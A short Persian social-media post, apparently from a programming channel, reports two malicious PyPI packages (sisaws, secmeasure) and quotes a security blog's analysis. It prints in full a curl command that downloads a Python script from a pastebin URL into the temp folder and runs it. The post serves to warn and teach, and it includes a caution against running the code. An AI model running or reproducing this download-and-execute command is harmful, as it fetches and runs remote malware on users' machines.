دوتا کتابخونه sisaws و secmeasure که هکر‌ها داخل PyPi گذاشته بودن. توضیحات بیشتر KALI

یکم گشتم داخل سایت Zscaler Blog توضیح داد که کتابخونه مورد نظر یه کد رو اجرا میکرد

If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script, as shown below.

curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py

نکته:‌به هیچ‌وجه کد رو اجرا نکنید، بنده هیچ مسئولیتی قبول نمیکنم.
حالا کدی که این دستور curl دانلود میکرد رو از همین لینک گرفتم.

کدهای دانلود شده داخل pdf زیر به صورت آموزشی توضیح داده میشن.

#python #malware #code_analysis

🌌 @the_code_Verse 🪐